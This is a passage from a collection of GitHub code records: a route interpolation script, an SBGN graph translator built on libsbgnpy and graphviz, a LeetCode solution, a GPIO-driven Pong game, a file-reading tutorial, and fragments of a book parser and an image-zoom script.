os.path.relpath(book_path),\n }\n all_books_params.append(book_params)\n except URLError:\n print(f\"{url} - Book not found\")\n continue\n except Exception as ex:\n raise requests.exceptions.HTTPError(ex)\n download_json(all_books_params, path, \"books_info.json\")\n","repo_name":"trofimleg0/Library-parser","sub_path":"parse_tululu_category.py","file_name":"parse_tululu_category.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23561875779","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 17 21:15:18 2018\n\n@author: tom_m\n\"\"\"\n\nimport csv\nimport numpy as np\n\n# USER INPUTS #################################################################\n\nrouteFilename = 'route.csv'\ninterpolatedRouteFilename = 'routeInterpolated.csv'\n\ndistanceStep = 10 # km\n\n###############################################################################\n\n# Import the full route data\nfile = open(routeFilename, 'r')\nrouteFile = csv.reader(file)\nheaders = []\ndata = {}\nnRow = 1\nfor row in routeFile:\n for index in range(0, len(row)) :\n value = row[index]\n if nRow is 1 :\n data[value] = []\n headers.append(value)\n else :\n data[headers[index]].append(float(value))\n nRow += 1\n\n# Find the interpolated locations\ninterpolated = {}\ninterpolated['distance'] = np.append(np.arange(0, data['distance'][-1], distanceStep), data['distance'][-1]).tolist()\n\nindex1 = 0\nindex2Start = 1\nwhile index1 < len(interpolated['distance']) :\n distance = interpolated['distance'][index1]\n print('distance = {}'.format(distance))\n \n for index2 in range(index2Start, len(data['distance'])) :\n if data['distance'][index2] >= distance :\n \n # Interpolate between the distances\n fraction = (distance - data['distance'][index2-1]) / (data['distance'][index2] - data['distance'][index2-1])\n for header in headers :\n if header == 'distance' :\n continue;\n if header not in interpolated :\n interpolated[header] = []\n interpolated[header].extend([data[header][index2-1] + fraction*(data[header][index2] - data[header][index2-1])])\n \n index1 += 1\n index2Start = index2\n break;\nfile.close()\n\n# Write output to csv\nfile = open(interpolatedRouteFilename, 'w+', newline='')\nwriter = csv.writer(file)\nwriter.writerow(headers)\nfor index in range(0, len(interpolated['distance'])) :\n rowData = []\n for header in headers :\n rowData.append(interpolated[header][index])\n writer.writerow(rowData)\n print('Written {}/{}'.format(index+1, len(interpolated['distance'])))\nfile.close()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zl326/RacePlanner","sub_path":"ancillary/python/discretiseRoute.py","file_name":"discretiseRoute.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72581168532","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#from __future__ import print_function\n#from __future__ import unicode_literals\nimport argparse\nimport codecs\nfrom graphviz import Digraph\nimport re\nimport sys\n\nimport libsbgnpy.libsbgn as libsbgn # import the bindings\nfrom libsbgnpy.libsbgnTypes import Language, GlyphClass, ArcClass\nfrom tradParams import *\n\nclass TraductionAF:\n \"\"\"\n Cette classe permet de traduire un graphe SBGNLog-AF stocké dans un\n fichier texte en langage SBGN-AF avec la library libsbgnpy.\n Pour obtenir les positions absolues des arcs et des noeuds,\n on utilise la library graphviz (langage DOT).\n -------------------------------------------------------------------\n @author: Elea Greugny\n @date: 21/07/16\n \"\"\"\n def __init__(self, fichier_entree, fichier_sortie):\n self.data = codecs.open(fichier_entree, 'r', 'utf8')\n self.sbgn = libsbgn.sbgn()\n self.map = libsbgn.map()\n self.map.set_language(Language.AF)\n self.sbgn.set_map(self.map)\n self.f_out = fichier_sortie\n #résolution de l'image : pixels / inch\n self.resolution = ParamsLogToAF.RESOLUTION\n\n #compteur de glyphs\n self.nb_glyph = 0\n #compteur d'arcs\n self.nb_arc = 0\n\n #dictionnaire qui fait correspondre les constantes logiques\n #associées aux glyphes (clé) avec les glyphs eux-mêmes.\n self.dic_const_glyph = {}\n\n #dictionnaire qui relie les glyphs (clés) aux arcs auxquels ils\n #participent en tant que source ou target, stockés sous forme\n #de liste de tuples : ('s' ou 't', arc).\n self.dic_glyph_arc = {}\n\n #dictionnaire qui permet d'accéder aux glyphs à partir de leur\n #id (clé)\n self.dic_id_glyph = {}\n\n #dictionnaire qui permet d'accéder aux glyphs contenus dans\n #un compartment (clé)\n self.dic_comp = {}\n\n #liste des glyphs n'appartenant à aucun compartment\n #initialisée quand tous les glyphs sont créés\n self.single_glyph = []\n\n #dictionnaire de fonctions:\n #associe un predicat à la fonction correpondante.\n self.dic_func = {'compartment' : self.create_glyph,\n 'ba' : self.create_glyph, 'perturbation' : self.create_glyph,\n 'phenotype' : self.create_glyph, 'and' : self.create_glyph,\n 'or' : self.create_glyph, 'not' : self.create_glyph,\n 'delay' : self.create_glyph, 'label' : self.create_label,\n 'input' : self.create_arc, 'stimulates' : self.create_arc,\n 'inhibits' : self.create_arc,\n 'unknownInfluences' : self.create_arc,\n 'necessarilyStimulates' : self.create_arc,\n 'localized' : self.create_localisation,\n 'uoi' : self.create_unitOfInformation,\n 'biologicalActivity' : self.create_glyph}\n\n #Graphe en langage DOT\n self.dot_graph = Digraph('G', filename='position_graph_sbgn.gv',\n format='plain', encoding='utf8')\n\n #hauteur et largeur du graphe en pixels : mise à jour au moment\n #de la lecture du fichier .gv.plain\n self.max_height = 0\n self.max_width = 0\n\n def create_glyph(self, const, cls):\n \"\"\"Crée un objet glyph de type cls.\n L'id sera 'glyphN' où N est le numero du glyph, incrémenté\n à chaque création de glyph.\"\"\"\n self.nb_glyph += 1\n box = libsbgn.bbox()\n gly = libsbgn.glyph(class_=cls, id='glyph' +\n str(self.nb_glyph), bbox=box)\n self.map.add_glyph(gly)\n if const in self.dic_const_glyph.keys():\n text = \"\"\"The same logical constant '\"\"\" + const + \"\"\"' may be\n associated with several glyphs or the glyph '\"\"\" + const + \"\"\"'\n may be declared several times.\"\"\"\n raise DuplicateError(text)\n else:\n self.dic_const_glyph[const] = gly\n self.dic_glyph_arc[gly] = []\n self.dic_id_glyph[gly.get_id()] = gly\n if cls == GlyphClass.COMPARTMENT:\n self.dic_comp[gly] = []\n\n def create_arc(self, const_s, const_t, cls_arc):\n \"\"\"Crée un objet arc de type cls_a.\n const_s et const_t désignent les constantes logiques associées\n aux glyphes source et target respectivement. Ces glyphs doivent\n être présents dans self.dic_const_glyph.\n L'id sera arcN où N est le numéro de l'arc, incrémenté\n à chaque création d'arc.\"\"\"\n self.nb_arc += 1\n try:\n sour = self.port_management(self.dic_const_glyph[const_s])\n except KeyError:\n msg = \"\"\"The source glyph '\"\"\" + const_s + \"\"\"' used in this\n arc has not been declared.\"\"\"\n raise MissingGlyphError(msg)\n try:\n targ = self.port_management(self.dic_const_glyph[const_t])\n except KeyError:\n msg = \"\"\"The target glyph '\"\"\" + const_t + \"\"\"' used in this\n arc has not been declared.\"\"\"\n raise MissingGlyphError(msg)\n arc = libsbgn.arc(class_=cls_arc, source=sour, target=targ,\n id='arc' + str(self.nb_arc))\n self.map.add_arc(arc)\n self.dic_glyph_arc[self.dic_const_glyph[const_s]].append(('s', arc))\n self.dic_glyph_arc[self.dic_const_glyph[const_t]].append(('t', arc))\n\n def port_management(self, gly):\n \"\"\"Cette méthode permet de gérer les ports d'un glyph au moment\n de l'ajout d'un arc. Si le glyph participe déjà à plusieurs arcs\n (autrement dit, il a déjà des ports), on crée un nouveau port.\n Si le glyph n'est lié qu'à un seul arc (il n'a pas de port),\n on crée deux ports, un premier sur lequel va se lier l'arc déjà\n présent, et un autre pour le nouvel arc. Si le glyph n'est lié\n à aucun arc, le nouvel arc se lie directement au glyph, pas\n besoin de port. Dans tous les cas, la méthode renvoie l'id de\n l'objet sur lequel va s'attacher le nouvel arc.\"\"\"\n if len(self.dic_glyph_arc[gly]) == 0:\n return gly.get_id()\n else:\n port_id = (gly.get_id() + '.' +\n str(len(self.dic_glyph_arc[gly])+1))\n port = libsbgn.port(id=port_id)\n gly.add_port(port)\n if len(self.dic_glyph_arc[gly]) == 1:\n port_id2 = (gly.get_id() + '.' +\n str(len(self.dic_glyph_arc[gly])))\n port2 = libsbgn.port(id=port_id2)\n gly.add_port(port2)\n first_arc_tuple = self.dic_glyph_arc[gly][0]\n if first_arc_tuple[0] == 's':\n first_arc_tuple[1].set_source(port2.get_id())\n else:\n first_arc_tuple[1].set_target(port2.get_id())\n return port.get_id()\n\n def create_label(self, const_g, lab):\n \"\"\"Crée un objet label avec pour attribut text la chaîne\n de caractère lab passée en paramètre, et l'associe au glyphe\n de constante logique const grâce au dictionnaire d'id.\"\"\"\n lab = lab.encode('utf8')\n lab = lab.replace('\"', '')\n label = libsbgn.label(text=lab.decode('utf8'))\n try:\n self.dic_const_glyph[const_g].set_label(label)\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n\n def create_localisation(self, const_g, const_c):\n \"\"\"Affecte le glyphe de constante logique const_g\n au compartiment de constante logique const_c\"\"\"\n try:\n gly = self.dic_const_glyph[const_g]\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n try:\n comp = self.dic_const_glyph[const_c]\n except KeyError:\n msg = \"\"\"The compartment '\"\"\" + const_c + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n gly.set_compartmentRef(comp.get_id())\n self.dic_comp[comp].append(gly)\n del self.single_glyph[self.single_glyph.index(gly)]\n\n def create_unitOfInformation(self, const_g, cls_ui, label_ui):\n \"\"\"Affecte un glyphe de type unit of information au glyphe\n de constante logique const_g. La classe de l'unité d'information\n est donnée par cls_ui. Son label, qui peut être vide est donné\n en paramètre. Cette méthode crée donc deux objets : le label\n de l'unité d'information et le glyph de type unité d'information.\n L'id de l'unité d'information est constitué de celui du glyphe\n auquel elle appartient, auquel on ajoute une lettre.\"\"\"\n box = libsbgn.bbox()\n try:\n uoi = libsbgn.glyph(class_=GlyphClass.UNIT_OF_INFORMATION,\n id=str(self.dic_const_glyph[const_g].get_id())+'a', bbox=box)\n except KeyError:\n msg = \"\"\"The glyph '\"\"\" + const_g + \"\"\"' has not been\n declared.\"\"\"\n raise MissingGlyphError(msg)\n if self.dic_const_glyph[const_g].get_class() != GlyphClass.COMPARTMENT:\n lab = label_ui.encode('utf8')\n lab = label_ui.replace('\"', '')\n lab = libsbgn.label(text=lab)#.decode('utf8'))\n uoi.set_label(lab)\n\n ent = libsbgn.entityType(name=cls_ui)\n uoi.set_entity(ent)\n else:\n cls_ui = cls_ui.replace('\"', '')\n label_ui = label_ui.replace('\"', '')\n if cls_ui == 'void':\n lab = libsbgn.label(text=label_ui)\n else:\n lab = libsbgn.label(text=cls_ui + ':' + label_ui)\n uoi.set_label(lab)\n\n self.dic_const_glyph[const_g].add_glyph(uoi)\n\n def logic_nodes_localisation(self):\n \"\"\"Place les glyphs logiques (or, and, not, delay) dans le\n compartment d'un de leur input. Si aucun de leur input n'est\n associé à un compartment, le glyph reste sans compartment.\"\"\"\n for gly in self.single_glyph:\n if gly.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n for couple in self.dic_glyph_arc[gly]:\n if couple[0] == 't':\n id_source = couple[1].get_source()\n if '.' in id_source:\n id_source = id_source[:id_source.find('.')]\n source = self.dic_id_glyph[id_source]\n if source.get_compartmentRef():\n comp = self.dic_id_glyph[\n source.get_compartmentRef()]\n self.dic_comp[comp].append(gly)\n del self.single_glyph[\n self.single_glyph.index(gly)]\n break\n\n def LogAF_to_AF(self):\n \"\"\"Lis le fichier d'entrée dans le langage SBGN-AF\n et crée les objets correspondants dans la library libsbgnpy.\"\"\"\n data = self.data.readlines()\n for line in data:\n #premier parcours pour créer tous les glyphs\n line = re.split('[(,)]', line)\n predicate = line[0]\n if len(line) == 3:\n #predicats du type : predicat(a)\n const = line[1]\n try:\n cls = ParamsLogToAF.DIC_GLYPH_TYPE[predicate]\n except KeyError:\n msg = \"\"\"'\"\"\" + predicate + \"\"\"' doesn't match\n any glyph type. The allowed types are : ba/biologicalActivity,\n perturbation, phenotype, and, or, not, delay,\n compartment.\"\"\"\n raise GlyphClassError(msg)\n params = [const, cls]\n func = self.dic_func[predicate]\n func(*params)\n self.single_glyph = list(self.map.get_glyph())\n\n for line in data:\n #second parcours pour les autres prédicats\n split_line = re.split('[(,)]', line)\n predicate = split_line[0]\n if predicate in ParamsLogToAF.DIC_ARC_TYPE.keys():\n const_s = split_line[1]\n const_t = split_line[2]\n cls_a = ParamsLogToAF.DIC_ARC_TYPE[predicate]\n params = [const_s, const_t, cls_a]\n func = self.dic_func[predicate]\n func(*params)\n else:\n if len(split_line) == 4:\n #predicats du type : predicat(a,b)\n if predicate in self.dic_func.keys():\n const = split_line[1]\n arg = split_line[2]\n params = [const, arg]\n func = self.dic_func[predicate]\n func(*params)\n else:\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n elif len(split_line) == 5:\n #predicats du type : predicat(a,b,c)\n #(affectation des unités auxiliaires)\n if predicate in self.dic_func.keys():\n const_g = split_line[1]\n cls_ui = ParamsLogToAF.DIC_UI_TYPE[\n split_line[2].replace('\"', '')]\n label = split_line[3]\n params = [const_g, cls_ui, label]\n func = self.dic_func[predicate]\n func(*params)\n else:\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n elif len(split_line) != 0 and (split_line[0] not in\n ParamsLogToAF.DIC_GLYPH_TYPE.keys()):\n msg = \"\"\"This line doesn't seem\n to match any logical predicate.\\n\"\"\" + line\n raise PredicateError(msg)\n\n self.logic_nodes_localisation()\n self.create_dot_graph()\n self.dot_graph.render('position_graph.gv', view=False)\n self.read_dot()\n\n def create_dot_graph(self):\n \"\"\"Cette méthode permet d'implémenter le graph SBGN en\n langage DOT. On ne cherche pas à reproduire la mise en forme\n particulière des graphs SBGN car on s'intéresse seulement aux\n positions absolues des noeuds et des arcs.\"\"\"\n #création des node inclus dans des compartments (clusters)\n comp_index = 0\n for comp in self.dic_comp.keys():\n cluster_name = 'cluster_' + str(comp_index)\n c = Digraph(cluster_name, encoding='utf8')\n for glyph in self.dic_comp[comp]:\n if glyph.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n c.node(glyph.get_id(),\n label=ParamsLogToAF.DIC_LOG_OP[glyph.get_class()],\n shape='circle')\n else:\n if glyph.get_label():\n c.node(glyph.get_id(),\n label=glyph.get_label().get_text().decode('utf8'))\n else:\n c.node(glyph.get_id())\n self.dot_graph.subgraph(c)\n comp_index += 1\n #création des node hors compartment\n for glyph in self.single_glyph:\n if glyph.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n self.dot_graph.node(glyph.get_id(),\n label=ParamsLogToAF.DIC_LOG_OP[glyph.get_class()],\n shape='circle')\n else:\n if glyph.get_label():\n self.dot_graph.node(glyph.get_id(),\n label=glyph.get_label().get_text())\n else:\n self.dot_graph.node(glyph.get_id())\n #création des arcs\n for arc in self.map.get_arc():\n if '.' in arc.get_source():\n source = arc.get_source()[:arc.get_source().find('.')]\n else:\n source = arc.get_source()\n if '.' in arc.get_target():\n target = arc.get_target()[:arc.get_target().find('.')]\n else:\n target = arc.get_target()\n self.dot_graph.edge(source, target, tailclip='true')\n\n def coord_dot_to_sbgn(self, xdot, ydot):\n \"\"\"En langage DOT, les coordonnées sont données en inch tandis\n qu'en SBGN elles le sont en pixels.\n L'origine d'un graphe DOT est située dans le coin en bas à\n gauche tandis que celle d'un graphe SBGN est située dans le\n coin supérieur gauche. Cette méthode permet donc de convertir\n les coordonnées DOT en coordonnées SBGN. Elle renvoie un tuple\n (xsbgn, ysbgn).\"\"\"\n xsbgn = xdot * self.resolution + 0.025 * self.max_width\n ysbgn = 1.025 * self.max_height - ydot * self.resolution\n return (xsbgn, ysbgn)\n\n def change_origin_glyph(self, xdot, ydot, wdot, hdot):\n \"\"\"En langage DOT, les coordonnées sont données en inch tandis\n qu'en SBGN elles le sont en pixels.\n L'origine d'un graphe DOT est située dans le coin en bas à\n gauche tandis que celle d'un graphe SBGN est située dans le\n coin supérieur gauche.\n De plus, en langage DOT, un glyph est caractérisé par le centre\n du rectangle, tandis que le langage SBGN le caractérise\n par son soin supérieur gauche. Cette méthode permet donc de\n calculer les coordonnées du coin supérieur gauche d'un glyph,\n à partir de celles du centre de son rectangle exprimées en inch.\n Cette méthode renvoie un tuple (xsbgn, ysbgn, wsbgn, hsbgn)\"\"\"\n wsbgn = wdot * self.resolution\n hsbgn = hdot * self.resolution\n xsbgn = xdot * self.resolution - (wsbgn/2.0) + self.max_width * 0.025\n ysbgn = 1.025 * self.max_height - ydot * self.resolution - (hsbgn/2.0)\n return (xsbgn, ysbgn, wsbgn, hsbgn)\n\n def change_origin_logop(self, xdot, ydot):\n \"\"\"En langage DOT, les coordonnées sont données en inch tandis\n qu'en SBGN elles le sont en pixels.\n L'origine d'un graphe DOT est située dans le coin en bas à\n gauche tandis que celle d'un graphe SBGN est située dans le\n coin supérieur gauche.\n De plus, en langage DOT, un glyph est caractérisé par le centre\n du rectangle, tandis que le langage SBGN le caractérise\n par son soin supérieur gauche.\n Cette méthode permet donc de calculer les coordonnées du coin\n supérieur gauche d'un glyph de type opérateur logique\n de dimension ParamsLogToAF.LOG_OP_DIM, à partir de celles du centre\n de son rectangle exprimées en inch.\n Cette méthode renvoie un tuple (xsbgn, ysbgn)\"\"\"\n dsbgn = ParamsLogToAF.LOG_OP_DIM\n xsbgn = xdot * self.resolution - (dsbgn/2.0) + self.max_width * 0.025\n ysbgn = 1.025 * self.max_height - ydot * self.resolution - (dsbgn/2.0)\n return (xsbgn, ysbgn)\n\n def set_glyph_position(self, id_g, xdot, ydot, wdot, hdot):\n \"\"\"Calcul des coordonnées x et y du glyph d'identifiant id_g\n à partir des cordonnées xdot et ydot fournies par DOT.\"\"\"\n gly = self.dic_id_glyph[id_g]\n if gly.get_class() in ParamsLogToAF.DIC_LOG_OP.keys():\n (x_gly, y_gly) = self.change_origin_logop(xdot, ydot)\n w_gly = ParamsLogToAF.LOG_OP_DIM\n h_gly = ParamsLogToAF.LOG_OP_DIM\n else:\n (x_gly, y_gly, w_gly, h_gly) = self.change_origin_glyph(xdot,\n ydot, wdot, hdot)\n box = libsbgn.bbox(x=x_gly, y=y_gly, w=w_gly,\n h=h_gly)\n gly.set_bbox(box)\n if gly.get_glyph():\n self.set_uoi_position(gly)\n\n def set_comp_position(self, id_comp):\n \"\"\"Calculs des coordonnées du compartment d'identifiant id_comp\n ainsi que la hauteur et la largeur de sa bbox à partir des bbox\n des glyphs qu'il contient.\"\"\"\n comp = self.dic_id_glyph[id_comp]\n x_pot_min = [gly.get_bbox().get_x() for gly in self.dic_comp[comp]]\n y_pot_min = [gly.get_bbox().get_y() for gly in self.dic_comp[comp]]\n x_pot_max = [gly.get_bbox().get_x() + gly.get_bbox().get_w()\n for gly in self.dic_comp[comp]]\n y_pot_max = [gly.get_bbox().get_y() + gly.get_bbox().get_h()\n for gly in self.dic_comp[comp]]\n x_min = min(x_pot_min)\n x_max = max(x_pot_max)\n y_min = min(y_pot_min)\n y_max = max(y_pot_max)\n\n w_comp = (x_max - x_min) * 1.1\n h_comp = (y_max - y_min) * 1.1\n x_comp = x_min - 0.05 * w_comp\n y_comp = y_min - 0.05 * h_comp\n box = libsbgn.bbox(x=x_comp, y=y_comp, w=w_comp, h=h_comp)\n comp.set_bbox(box)\n if comp.get_glyph():\n self.set_uoi_position(comp)\n\n def set_uoi_position(self, gly):\n \"\"\"Calcul des dimensions de la bbox de l'unité d'information du\n glyph gly. Les coordonnées de gly doivent avoir été calculées\n avant.\"\"\"\n if gly.get_class() == GlyphClass.COMPARTMENT:\n h_uoi = ParamsLogToAF.HEIGHT_COMPARTMENT_UOI\n else:\n h_uoi = ParamsLogToAF.HEIGHT_GLYPH_UOI\n\n try:\n w_uoi = (ParamsLogToAF.WIDTH_EMPTY_UOI +\n ParamsLogToAF.WIDTH_MAX_LETTER *\n len(gly.get_glyph()[0].get_label().get_text()))\n except AttributeError:\n w_uoi = ParamsLogToAF.WIDTH_EMPTY_UOI\n\n x_gly = gly.get_bbox().get_x()\n y_gly = gly.get_bbox().get_y()\n w_gly = gly.get_bbox().get_w()\n\n x_uoi = x_gly + 0.1 * w_gly\n y_uoi = y_gly - h_uoi / 2.0\n\n box = libsbgn.bbox(x=x_uoi, y=y_uoi, w=w_uoi, h=h_uoi)\n gly.get_glyph()[0].set_bbox(box)\n\n def set_arc_position(self, id_source, id_target, points):\n \"\"\"Calcul du tracé de l'arc reliant source à target, passant\n par les éléments de la liste points (tuples (x, y))\"\"\"\n source = self.dic_id_glyph[id_source]\n #recherche de l'arc\n for couple in self.dic_glyph_arc[source]:\n if couple[0] == 's':\n possible_target = couple[1].get_target()\n if '.' in possible_target:\n possible_target = possible_target[\n :possible_target.find('.')]\n if possible_target == id_target:\n arc = couple[1]\n break\n #mise en forme des points\n trace = []\n for p in points:\n x_p = p[0]\n y_p = p[1]\n (x_p, y_p) = self.coord_dot_to_sbgn(x_p, y_p)\n trace.append(libsbgn.point(x=x_p, y=y_p))\n #ajout des points à l'arc\n if len(trace) > 2:\n #arc.set_start(trace[0])\n arc.set_start(trace[1])\n #arc.set_next(trace[1:len(trace)-1])\n else:\n arc.set_start(trace[0])\n arc.set_end(trace[-1])\n #implémentation des coordonnées des éventuels ports\n if '.' in arc.get_source():\n self.set_port_position(arc.get_source(), id_source, trace[0])\n if '.' in arc.get_target():\n self.set_port_position(arc.get_target(), id_target, trace[-1])\n\n def set_port_position(self, id_port, id_glyph, point):\n \"\"\"Implémentation des coordonnées x et y du port d'identifiant\n id_port appartenant au glyph d'identifiant id_glyph. L'objet point\n donné en paramètre correspond à l'extrémité d'un arc auquel\n participe le port. Si le port n'a pas encore de coordonnées, on\n prendra celles de ce point. Sinon, on conserve les précédentes.\"\"\"\n gly = self.dic_id_glyph[id_glyph]\n for port in gly.get_port():\n if port.get_id() == id_port:\n if not port.get_x() and not port.get_y():\n port.set_x(point.get_x())\n port.set_y(point.get_y())\n break\n\n def read_dot(self):\n \"\"\"Lecture du fichier .gv.plain et récupération des\n positions des glyphs et des arcs.\"\"\"\n dot = codecs.open('position_graph.gv.plain', 'r', 'utf8')\n lines = dot.readlines()\n for i in range(len(lines)):\n lines[i] = lines[i].split()\n self.map.set_bbox(libsbgn.bbox(x=0, y=0,\n w=float(lines[0][2]) * self.resolution * 1.05,\n h=float(lines[0][3]) * self.resolution * 1.05))\n self.max_height = float(lines[0][3]) * self.resolution\n self.max_width = float(lines[0][2]) * self.resolution\n for line in lines[1:]:\n #premier passage pour les positions des glyphs\n #sauf ceux de type Compartment\n if line[0] == 'node':\n if self.dic_id_glyph[line[1]] not in self.dic_comp.keys():\n self.set_glyph_position(line[1], float(line[2]),\n float(line[3]), float(line[4]), float(line[5]))\n elif line[0] == 'edge':\n nb_points = int(line[3])\n points = []\n for i in range(0, 2 * nb_points, 2):\n points.append((float(line[4 + i]), float(line[4 + i + 1])))\n self.set_arc_position(line[1], line[2], points)\n for line in lines[1:]:\n #deuxieme passage pour les positions des compartments\n if (line[0] == 'node' and\n (self.dic_id_glyph[line[1]] in self.dic_comp.keys())):\n self.set_comp_position(line[1])\n dot.close()\n\n def output_f(self):\n \"\"\"Création du fichier de sortie .sbgn\"\"\"\n self.sbgn.write_file(self.f_out)\n\n def translation(self):\n \"\"\"Enchainement des méthodes pour traduire le graphe SBGNLog-AF\n en graph SBGN-AF.\"\"\"\n self.LogAF_to_AF()\n self.output_f()\n \n\n","repo_name":"eleagreugny/LRI","sub_path":"traducteurLogAF_to_AF.py","file_name":"traducteurLogAF_to_AF.py","file_ext":"py","file_size_in_byte":25864,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23876976925","text":"class Solution:\n def checkSubarraySum(self, nums: list[int], k: int) -> bool:\n dic, s = {0: -1}, 0\n for index, val in enumerate(nums):\n if k != 0:\n s = (s + val) % k\n else:\n s += val\n if s not in dic:\n dic[s] = index\n elif index - dic[s] >= 2:\n return True\n return False\n","repo_name":"vishrutkmr7/MyLeetCodeSubmissions","sub_path":"problems/continuous_subarray_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"32550300960","text":"\"\"\"\nStreet Pong\nBuild 18 2015\nLeanna Pancoast, Spencer Barton, Justin Frye\n\nPong Game View\n\"\"\"\n\n#=====================================================\n# Imports\n#=====================================================\n\nimport pygame as pg\nimport sys\nimport Pong.PongGameModel as Model\nimport Pong.PongGameView as View\n\n# for gpio\nimport os\n#=====================================================\n# set up gpio\n#=====================================================\nGPIO_MODE_PATH = os.path.normpath('/sys/devices/virtual/misc/gpio/mode/')\nGPIO_PIN_PATH = os.path.normpath('/sys/devices/virtual/misc/gpio/pin/')\nGPIO_FILENAME = \"gpio\"\n\nHIGH = \"1\"\nLOW = \"0\"\nINPUT = \"0\"\nOUTPUT = \"1\"\nINPUT_PU = \"8\"\n\n#=====================================================\n# set pins to be inputs\n#=====================================================\n\nbuttonL_pin_mode = os.path.join(GPIO_MODE_PATH, 'gpio'+str(7))\nbuttonR_pin_mode = os.path.join(GPIO_MODE_PATH, 'gpio'+str(12))\n\nbuttonL_pin = os.path.join(GPIO_PIN_PATH, 'gpio'+str(7))\nbuttonR_pin = os.path.join(GPIO_PIN_PATH, 'gpio'+str(12))\n\nfile = open(buttonL_pin_mode, 'r+')\nfile.write(INPUT)\nfile.close()\n\nfile = open(buttonR_pin_mode, 'r+')\nfile.write(INPUT)\nfile.close()\n\n#=====================================================\n# Pong\n#=====================================================\n\nclass Pong(object):\n\n # TODO pausing/timeout\n # TODO better graphics\n # TODO AI when in resting mode\n # TODO full screen\n # TODO ball goes over endline\n\n WIDTH, HEIGHT = 480, 480\n PADDLE_W = 50\n PADDLE_H = 6\n END_ZONE = 30\n BALL_RADIUS = 10\n FPS = 50\n MAX_SCORE = 3\n GAME_OVER_DELAY = 4800\n\n def __init__(s):\n s.size = (s.WIDTH, s.HEIGHT)\n\n pg.init()\n s.screen = pg.display.set_mode(s.size, pg.FULLSCREEN)\n # s.screen = pg.display.set_mode(s.size)\n\n s.model = Model.PongGameModel('Player1', 'Player2', s.WIDTH, s.HEIGHT, s.END_ZONE, s.PADDLE_W,\n s.BALL_RADIUS)\n s.view = View.PongGameView(s.model, s.screen, s.WIDTH, s.HEIGHT, s.END_ZONE, s.PADDLE_W, s.PADDLE_H, \n s.BALL_RADIUS)\n\n #==== Public Methods ========================================\n\n def run(s):\n clock = pg.time.Clock()\n\n while True:\n cmds = s._handleEvts()\n\n score = s.model.step(cmds[0], cmds[1])\n \n if max(score) == s.MAX_SCORE:\n s.view.gameOver()\n s.model.reset()\n pg.time.wait(s.GAME_OVER_DELAY)\n else:\n s.view.show()\n clock.tick(s.FPS)\n \n def _handleEvts(s):\n move1 = s.model.MV_STAY\n move2 = s.model.MV_STAY\n \n # getting input from L button\n tempL = ['']\n file = open(buttonL_pin, 'r')\n tempL[0] = file.read()\n file.close()\n \n # getting input from R button\n tempR = ['']\n file = open(buttonR_pin, 'r')\n tempR[0] = file.read()\n file.close()\n \n pressed = pg.key.get_pressed()\n if ( '0' in tempL[0] ) :\n move1 = s.model.MV_LEFT\n elif ( '0' in tempR[0] ) :\n move1 = s.model.MV_RIGHT\n if pressed[pg.K_j]:\n move2 = s.model.MV_LEFT\n elif pressed[pg.K_l]:\n move2 = s.model.MV_RIGHT\n elif pressed[pg.K_q]:\n s._quit()\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n s._quit()\n elif event.type == pg.KEYDOWN:\n if event.key == pg.K_q:\n s._quit()\n\n return (move1, move2)\n\n def _quit(s):\n pg.display.quit()\n sys.exit()\n\n\nif __name__ == '__main__':\n pong = Pong()\n pong.run()\n","repo_name":"sbarton272/StreetPong","sub_path":"StreetPong/goodButtonPong.py","file_name":"goodButtonPong.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3850298148","text":"# 文件在'r'模式下可以进行文件读取\n# read 可以读取文件\n\n# 打开文件\nfile = open('python.txt', 'r')\n# 读取文件\n# n:在read中传入数值,代表我们读取的最大字符数\n# 如果开发中有一个文本文件,比如网络小说,4个G大小,一次性读取,用户依次读取这么大的文件,极度消耗性能,而且 等待时间过长\n# 所以在开发中我们经常会给读取数据的值做一个限定,最大读取字符一般限定为(1024*1024)\n\n# 那我们使用read只能依次读取3个字符,那省下的字符我们怎样读取呢?\n# 文件每一次读取,都会持续向后读取,直到文件关闭或程序结束,所以可以使用循环进行读取\n# 在所有的文件内容读取完成后,会持续返回空字符串(\"\")\nwhile True:\n content = file.read(3)\n if content == '':\n break\n print(content)\n\n# 关闭文件\nfile.close()","repo_name":"yujale/python-learn","sub_path":"python-basics/05-python 文件/01-文件读取.py","file_name":"01-文件读取.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9405871833","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nplt.ion()\n\n\ndef repeat_rows(row,scale):\n\trep_rows = np.array([row,]*scale)\n\treturn rep_rows\n\ndef repeat_columns(row,scale):\n\trep_columns = np.array([row,]*scale).transpose()\n\treturn rep_columns\n\n\ndef image_zooming(img,factor):\n\tlayer = img[:,:]\n\tfor j in range(0,layer.shape[0],factor):\n\t\trow = layer[j,:]\n\t\trows = repeat_rows(row,factor)\n\t\tif 